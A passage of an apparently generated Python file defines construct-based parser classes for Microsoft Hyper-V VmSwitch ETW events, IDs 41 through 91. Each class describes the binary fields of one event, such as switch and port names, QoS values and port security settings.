"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=41, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_41_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=42, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_42_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=43, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_43_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=44, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_44_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"SourceProcIndex" / Int32ul,
"DestinationProcIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=45, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_45_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=46, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_46_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=47, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_47_0(Etw):
pattern = Struct(
"CurrentTime" / Int64ul,
"BytesSent" / Int32ul,
"BytesDropped" / Int32ul,
"NewSendWindow" / Int32ul,
"MinSendWindow" / Int32ul,
"Weight" / Int32ul,
"SBytesRequested" / Int64sl,
"DropRate" / Int32ul,
"IdleIntervals" / Int64ul,
"RcSendWindow" / Int32ul,
"RcEpisodeLength" / Int32ul,
"RcStatMuxFactor" / Int32ul,
"RcExitThreshold" / Int32ul,
"AverageMaxBytesRequested" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=48, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_48_0(Etw):
pattern = Struct(
"CurrentTime" / Int64ul,
"ActiveFlows" / Int32ul,
"ActiveWeight" / Int32ul,
"NewSendWindow" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=49, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_49_0(Etw):
pattern = Struct(
"FlowConformanceEvent" / Int32ul,
"CurrentTime" / Int64ul,
"LastConformanceTime" / Int64ul,
"PeakConformanceTime" / Int64ul,
"Tokens" / Int64ul,
"MaxTokens" / Int64ul,
"Rate" / Int64ul,
"LastConformanceCredits" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=50, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_50_0(Etw):
pattern = Struct(
"FlowSendQueueEvent" / Int32ul,
"CurrentTime" / Int64ul,
"IdleTime" / Int64ul,
"DelayTime" / Int64ul,
"BytesRequested" / Int32ul,
"BytesSent" / Int32ul,
"BytesQueued" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=51, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_51_0(Etw):
pattern = Struct(
"TimerEvent" / Int32ul,
"TimerId" / Int32ul,
"CurrentTime" / Int64ul,
"SetTime" / Int64ul,
"RunTime" / Int64ul,
"FlowsProcessed" / Int32ul,
"NblsSent" / Int32ul,
"NblsDropped" / Int32ul,
"Flags" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=52, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_52_0(Etw):
pattern = Struct(
"CurrentTime" / Int64ul,
"BytesRequested" / Int32ul,
"BytesCompleted" / Int32ul,
"BytesInQueue" / Int32ul,
"BufferAvailable" / Int64sl,
"BetaTerm" / Int64sl,
"AlphaTerm" / Int64sl,
"DeltaSendWindow" / Int64sl,
"NewSendWindow" / Int64sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=53, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_53_0(Etw):
pattern = Struct(
"DropReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=54, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_54_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DropReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=55, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_55_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DropReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=56, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_56_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"BufferAddress" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=57, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_57_0(Etw):
pattern = Struct(
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"DestNicNameLen" / Int32ul,
"DestNicName" / Bytes(lambda this: this.DestNicNameLen),
"DestNicFNameLen" / Int32ul,
"DestNicFName" / Bytes(lambda this: this.DestNicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"BufferAddress" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=58, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_58_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"BufferAddress" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=59, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_59_0(Etw):
pattern = Struct(
"ExtensionNameLen" / Int32ul,
"ExtensionName" / Bytes(lambda this: this.ExtensionNameLen),
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"DestNicNameLen" / Int32ul,
"DestNicName" / Bytes(lambda this: this.DestNicNameLen),
"DestNicFNameLen" / Int32ul,
"DestNicFName" / Bytes(lambda this: this.DestNicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=60, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_60_0(Etw):
pattern = Struct(
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ExtensionGuidLen" / Int32ul,
"ExtensionGuid" / Bytes(lambda this: this.ExtensionGuidLen),
"ExtensionFriendlyNameLen" / Int32ul,
"ExtensionFriendlyName" / Bytes(lambda this: this.ExtensionFriendlyNameLen),
"ReasonLen" / Int32ul,
"Reason" / Bytes(lambda this: this.ReasonLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=61, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_61_0(Etw):
pattern = Struct(
"ExtensionNameLength" / Int32ul,
"ExtensionName" / Bytes(lambda this: this.ExtensionNameLength),
"ExtensionId" / Guid,
"FeatureClassId" / Guid,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"VMNameLen" / Int32ul,
"VMName" / Bytes(lambda this: this.VMNameLen),
"VMIdLen" / Int32ul,
"VMId" / Bytes(lambda this: this.VMIdLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=62, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_62_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=63, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_63_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=64, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_64_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=65, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_65_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=66, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_66_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=67, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_67_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=68, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_68_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=69, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_69_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=70, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_70_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=71, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_71_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=72, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_72_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=73, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_73_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=74, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_74_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=75, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_75_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=76, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_76_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Operation" / Int32ul,
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=77, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_77_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=78, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_78_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"UniqueEvent" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=79, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_79_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=80, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_80_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"UniqueEvent" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=81, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_81_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=82, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_82_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Reservation" / Int64sl,
"Weight" / Int64sl,
"Limit" / Int64sl,
"BurstLimit" / Int64sl,
"BurstSize" / Int64sl,
"FailReason" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=83, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_83_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Reservation" / Int64sl,
"Weight" / Int64sl,
"Limit" / Int64sl,
"BurstLimit" / Int64sl,
"BurstSize" / Int64sl,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=84, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_84_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Status" / Int32ul,
"Reservation" / Int64sl,
"Weight" / Int64sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=85, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_85_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Status" / Int32ul,
"Reservation" / Int64sl,
"Weight" / Int64sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=86, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_86_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"UniqueEvent" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=87, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_87_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=88, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_88_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"AllowMacSpoofing" / Int8ul,
"EnableDhcpGuard" / Int8ul,
"EnableRouterGuard" / Int8ul,
"MonitorMode" / Int32ul,
"MonitorSession" / Int32ul,
"AllowIeeePriorityTag" / Int8ul,
"VirtualSubnetId" / Int32ul,
"AllowTeaming" / Int8ul,
"StormLimit" / Int32ul,
"DynamicIPAddressLimit" / Int32ul,
"EnableFixSpeed10G" / Int8ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=89, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_89_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"AllowMacSpoofing" / Int8ul,
"EnableDhcpGuard" / Int8ul,
"EnableRouterGuard" / Int8ul,
"MonitorMode" / Int32ul,
"MonitorSession" / Int32ul,
"AllowIeeePriorityTag" / Int8ul,
"VirtualSubnetId" / Int32ul,
"AllowTeaming" / Int8ul,
"StormLimit" / Int32ul,
"DynamicIPAddressLimit" / Int32ul,
"EnableFixSpeed10G" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=90, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_90_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Direction" / Int32ul,
"Applicability" / Int32ul,
"Type" / Int32ul,
"Action" / Int32ul,
"LocalAddrLen" / Int32ul,
"LocalAddr" / Bytes(lambda this: this.LocalAddrLen),
"LocalPrefix" / Int32ul,
"RemoteAddrLen" / Int32ul,
"RemoteAddr" / Bytes(lambda this: this.RemoteAddrLen),
"RemotePrefix" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=91, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_91_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
